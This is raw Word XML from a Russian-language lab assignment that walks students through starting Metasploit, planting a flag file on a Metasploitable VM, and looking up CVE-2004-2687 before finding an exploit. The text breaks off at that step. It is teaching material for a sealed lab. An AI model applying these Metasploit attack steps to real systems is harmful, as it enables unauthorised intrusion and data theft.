          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> откройте дополнительный терминал и запустите в нём </w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149CA98" w14:textId="77777777" w:rsidR="002A4ECB" w:rsidRPr="00154310" w:rsidRDefault="002A4ECB" w:rsidP="002A4ECB">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> использует </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> как его базу данных, следовательно сначала её нужно запустить: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66EE1B68" w14:textId="77777777" w:rsidR="002A4ECB" w:rsidRPr="00154310" w:rsidRDefault="002A4ECB" w:rsidP="002A4ECB">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Вы можете убедиться, работает ли </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверив вывод </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>ant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> и убедившись, что порт 5432 прослушивается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E5E17" w14:textId="77777777" w:rsidR="002A4ECB" w:rsidRPr="00154310" w:rsidRDefault="002A4ECB" w:rsidP="002A4ECB">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">С запущенной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">, следующее, что нам нужно, это запустить службу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">. В первый раз, когда запущена служба, она создаст базу данных msf3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> и базу данных называемую msf3. Служба также запустит </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> RPC и веб-сервер, который ей требуется: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EA7D510" w14:textId="718C751D" w:rsidR="002A4ECB" w:rsidRPr="00154310" w:rsidRDefault="002A4ECB" w:rsidP="002A4ECB">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve">Сейчас, когда службы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> запущены, вы можете запустить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> и проверить работу базы данных командой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> как показано ниже: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57BBFE78" w14:textId="7320DC14" w:rsidR="00E05577" w:rsidRDefault="00D538C1" w:rsidP="005E5A93">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00F357F2" w:rsidRPr="00F357F2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F357F2">
        <w:t xml:space="preserve">Ознакомиться </w:t>
      </w:r>
      <w:r>
        <w:t>с информационным ресурсом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E1DE7" w14:textId="77777777" w:rsidR="00F357F2" w:rsidRDefault="00A72E08" w:rsidP="005E5A93">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00F357F2">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="782C2D92" w14:textId="7616EEAD" w:rsidR="00D538C1" w:rsidRDefault="00ED28F3" w:rsidP="005E5A93">
      <w:r>
        <w:t>В случае ошибок при выполнении Л/р в первую очередь обратитесь к содержимому данного ресурса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7EAB22" w14:textId="77777777" w:rsidR="00ED28F3" w:rsidRDefault="00ED28F3" w:rsidP="005E5A93"/>
    <w:p w14:paraId="386E1EBB" w14:textId="5A05A32F" w:rsidR="00F357F2" w:rsidRDefault="00D538C1" w:rsidP="005E5A93">
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C">
        <w:t>. С браузера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на основной машине</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C">
        <w:t xml:space="preserve"> запустит</w:t>
      </w:r>
      <w:r>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00582F8C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C">
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C" w:rsidRPr="00582F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk34166963"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C0952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00CD73E1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etasploit</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>able</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00582F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="009C2C82">
        <w:t xml:space="preserve">(например, </w:t>
      </w:r>
      <w:r w:rsidR="009C2C82">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="009C2C82" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C2C82">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disclosure</w:t>
      </w:r>
      <w:r w:rsidR="009C2C82" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="009C2C82" w:rsidRPr="00FB0948">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="009C2C82" w:rsidRPr="009C2C82">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>://192.168.56.103/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="009C2C82" w:rsidRPr="00FB0948">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>phpinfo</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="009C2C82">
        <w:t>) и</w:t>
      </w:r>
      <w:r w:rsidR="00582F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C2C82">
        <w:t xml:space="preserve">изучить </w:t>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:r w:rsidR="009C2C82">
        <w:t>содержимое</w:t>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r w:rsidR="009C0952">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
      <w:r w:rsidR="009C0952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0385D377" w14:textId="53AEDF33" w:rsidR="00305AB8" w:rsidRPr="009C2C82" w:rsidRDefault="00305AB8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400E2092" w14:textId="094546A2" w:rsidR="00305AB8" w:rsidRPr="009C2C82" w:rsidRDefault="009C2C82" w:rsidP="00305AB8">
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:t>Создадим</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:t>флаг</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A63E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для того, чтобы затем «украсть» его из системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79045E8C" w14:textId="77777777" w:rsidR="00305AB8" w:rsidRPr="0058112A" w:rsidRDefault="00305AB8" w:rsidP="00305AB8">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A0C53" w14:textId="77777777" w:rsidR="009C2C82" w:rsidRPr="0058112A" w:rsidRDefault="009C2C82" w:rsidP="00305AB8"/>
    <w:p w14:paraId="37AC1513" w14:textId="2ABEFB01" w:rsidR="00305AB8" w:rsidRPr="009C2C82" w:rsidRDefault="009C2C82" w:rsidP="00305AB8">
      <w:r w:rsidRPr="009C2C82">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:t>Запишем</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:t>туда</w:t>
      </w:r>
      <w:r w:rsidR="00305AB8" w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305AB8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidR="009C0952">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>взамен</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2C82">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:t>» может быть сохранена конфиденциальная информация, персональные данные, ключи шифрования, логины и иные данные)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB14940" w14:textId="1D546CDA" w:rsidR="00305AB8" w:rsidRPr="002E3825" w:rsidRDefault="00305AB8" w:rsidP="00305AB8">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3825">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3825">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">’ &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0B9C4" w14:textId="7C079B56" w:rsidR="009C0952" w:rsidRDefault="009C0952" w:rsidP="00305AB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Вместо «</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0952">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вам необходимо указать следующую информацию:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A51DF33" w14:textId="6385E546" w:rsidR="009C0952" w:rsidRDefault="009C0952" w:rsidP="00305AB8">
      <w:r>
        <w:t>Заглавные буквы ФИО исполнителя(ей) Л/р, дата выполнения Л/р, номер компьютера, за которым была выполнена Л/р (если Л/р выполнена на личном ПК, указать значение «0»)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9893F" w14:textId="4B996794" w:rsidR="009C0952" w:rsidRPr="009C0952" w:rsidRDefault="009C0952" w:rsidP="00305AB8">
      <w:r>
        <w:t xml:space="preserve">Проведите проверку полученных </w:t>
      </w:r>
      <w:commentRangeStart w:id="5"/>
      <w:r>
        <w:t>результатов</w:t>
      </w:r>
      <w:commentRangeEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="5"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (в нашем случае в флаг был занесён </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0952">
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C0952">
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C0952">
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522AA5C" w14:textId="77777777" w:rsidR="00305AB8" w:rsidRPr="00305AB8" w:rsidRDefault="00E35031" w:rsidP="002A4ECB">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E35031">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A5A80AD" wp14:editId="03AD8722">
            <wp:extent cx="5760000" cy="7111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820"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="71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71EC" w14:textId="7276843C" w:rsidR="00305AB8" w:rsidRPr="00305AB8" w:rsidRDefault="00305AB8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F955728" w14:textId="41B0F5D9" w:rsidR="00575645" w:rsidRPr="00E704F7" w:rsidRDefault="00E704F7" w:rsidP="00575645">
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00575645">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ознакомьтесь с уязвимостью на сайте </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mitre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D6D00" w14:textId="77777777" w:rsidR="00575645" w:rsidRDefault="00A72E08" w:rsidP="00575645">
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00575645">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38745DA6" w14:textId="3012BB62" w:rsidR="00E704F7" w:rsidRDefault="00E704F7" w:rsidP="00575645">
      <w:r>
        <w:t>Обратите внимание на раздел «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E704F7">
        <w:t>Description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="002A4ECB">
        <w:t xml:space="preserve">. Переведите смысл </w:t>
      </w:r>
      <w:r w:rsidR="009C0952">
        <w:t xml:space="preserve">содержащейся в </w:t>
      </w:r>
      <w:r w:rsidR="002A4ECB">
        <w:t>раздел</w:t>
      </w:r>
      <w:r w:rsidR="009C0952">
        <w:t>е информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC11CC2" w14:textId="59AB6F99" w:rsidR="00575645" w:rsidRPr="009C0952" w:rsidRDefault="002A4ECB" w:rsidP="00575645">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00575645" w:rsidRPr="001A63E6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00575645">
        <w:t xml:space="preserve">Найти </w:t>
      </w:r>
      <w:commentRangeStart w:id="6"/>
      <w:r w:rsidR="00575645">
        <w:t>эксплойт</w:t>
      </w:r>
      <w:commentRangeEnd w:id="6"/>
      <w:r w:rsidR="00ED28F3">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="6"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07791339" w14:textId="77777777" w:rsidR="00575645" w:rsidRDefault="00575645" w:rsidP="002A4ECB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00575645">
        <w:rPr>
          <w:noProof/>
